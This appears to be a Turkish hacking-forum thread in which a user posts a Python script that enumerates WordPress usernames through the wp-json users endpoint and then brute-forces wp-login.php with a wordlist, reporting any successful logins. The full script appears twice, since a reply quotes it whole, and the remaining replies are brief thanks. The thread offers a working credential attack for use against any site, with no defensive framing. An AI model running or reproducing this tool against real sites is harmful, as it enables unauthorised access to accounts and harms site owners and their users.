Wordpress Username Enumerate ve Brute-Forcer

z3n · 4 May 2024

Wordpressten usernameyi enum eder ve direkt bruteforce yapmaya çalışır gayette çalışıyor.

Python:

#!/usr/bin/env python3

import os
import subprocess
import requests
import json

user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
output_dir = "log"
wordlist_file = input("Wordlist: ")


def banner():
    os.system("clear")
    print(""" ##KarsikaX WP Exploit## """)


def create_log(url, user_list):
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    domain = url.split('//')[1].split('/')[0]
    domain = domain.replace('.', '_')

    with open(os.path.join(output_dir, domain), 'w') as file:
        for user in user_list:
            file.write(f"{user}\n")

    print(f"[+] All found usernames are stored in {os.path.join(output_dir, domain)}")


def bruteforce(target, username, password_list):
    for password in password_list:
        login_url = f"{target}/wp-login.php"
        data = {"log": username, "pwd": password, "wp-submit": "Log In"}

        response = requests.post(login_url, data=data, headers={"User-Agent": user_agent})

        if "wp-admin" in response.url:
            print(f"[+] Successful login: {username} : {password}")
            return True

    print(f"[-] Brute-force unsuccessful for username: {username}")
    return False


def read_wordlist(wordlist_file):
    with open(wordlist_file, 'r') as file:
        return [line.strip() for line in file.readlines()]


def enum_from_json(target):
    url = f"{target}/wp-json/wp/v2/users/"
    response = requests.get(url, headers={"User-Agent": user_agent})

    if response.status_code != 200:
        print("[-] Unable to find user from JSON")
    else:
        user_data = response.json()
        user_list = [user["slug"] for user in user_data]
        user_total = len(user_list)
        print(f"[+] Found {user_total} usernames in /wp-json")
        create_log(target, user_list)

        wordlist = read_wordlist(wordlist_file)

        for username in user_list:
            bruteforce(target, username, wordlist)


def main(target):
    def filter_url(url):
        return not url.lower().startswith(("http://", "https://"))

    if filter_url(target):
        print("[-] Your given URL seems to be invalid.")
        exit(1)

    print(f"[+] Start scanning {target}")
    enum_from_json(target)
    print("[+] Finished scanning.")


if __name__ == "__main__":
    banner()

    import sys

    if len(sys.argv) != 2:
        print("[+] Usage: {} <url>".format(sys.argv[0]))
        exit(0)

    main(sys.argv[1])

Privarp · 4 May 2024

z3n' Alıntı:

Wordpressten usernameyi enum eder ve direkt bruteforce yapmaya çalışır gayette çalışıyor.

Python:

#!/usr/bin/env python3

import os
import subprocess
import requests
import json

user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
output_dir = "log"
wordlist_file = input("Wordlist: ")


def banner():
    os.system("clear")
    print(""" ##KarsikaX WP Exploit## """)


def create_log(url, user_list):
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    domain = url.split('//')[1].split('/')[0]
    domain = domain.replace('.', '_')

    with open(os.path.join(output_dir, domain), 'w') as file:
        for user in user_list:
            file.write(f"{user}\n")

    print(f"[+] All found usernames are stored in {os.path.join(output_dir, domain)}")


def bruteforce(target, username, password_list):
    for password in password_list:
        login_url = f"{target}/wp-login.php"
        data = {"log": username, "pwd": password, "wp-submit": "Log In"}

        response = requests.post(login_url, data=data, headers={"User-Agent": user_agent})

        if "wp-admin" in response.url:
            print(f"[+] Successful login: {username} : {password}")
            return True

    print(f"[-] Brute-force unsuccessful for username: {username}")
    return False


def read_wordlist(wordlist_file):
    with open(wordlist_file, 'r') as file:
        return [line.strip() for line in file.readlines()]


def enum_from_json(target):
    url = f"{target}/wp-json/wp/v2/users/"
    response = requests.get(url, headers={"User-Agent": user_agent})

    if response.status_code != 200:
        print("[-] Unable to find user from JSON")
    else:
        user_data = response.json()
        user_list = [user["slug"] for user in user_data]
        user_total = len(user_list)
        print(f"[+] Found {user_total} usernames in /wp-json")
        create_log(target, user_list)

        wordlist = read_wordlist(wordlist_file)

        for username in user_list:
            bruteforce(target, username, wordlist)


def main(target):
    def filter_url(url):
        return not url.lower().startswith(("http://", "https://"))

    if filter_url(target):
        print("[-] Your given URL seems to be invalid.")
        exit(1)

    print(f"[+] Start scanning {target}")
    enum_from_json(target)
    print("[+] Finished scanning.")


if __name__ == "__main__":
    banner()

    import sys

    if len(sys.argv) != 2:
        print("[+] Usage: {} <url>".format(sys.argv[0]))
        exit(0)

    main(sys.argv[1])

Elinize sağlık.

z3n · 5 May 2024

pcruss' Alıntı:
Elinize sağlık.

Teşekkürler.

basr1ko · Pazartesi saat 12:47'de

eline sağlık güncel

Wordpress Username Enumerate ve Brute-Forcer

z3n

Üye

Privarp

Anka Team Junior

z3n

Üye

basr1ko

Moderasyon Ekibi Çaylak

Sosyal medya sayfalarımız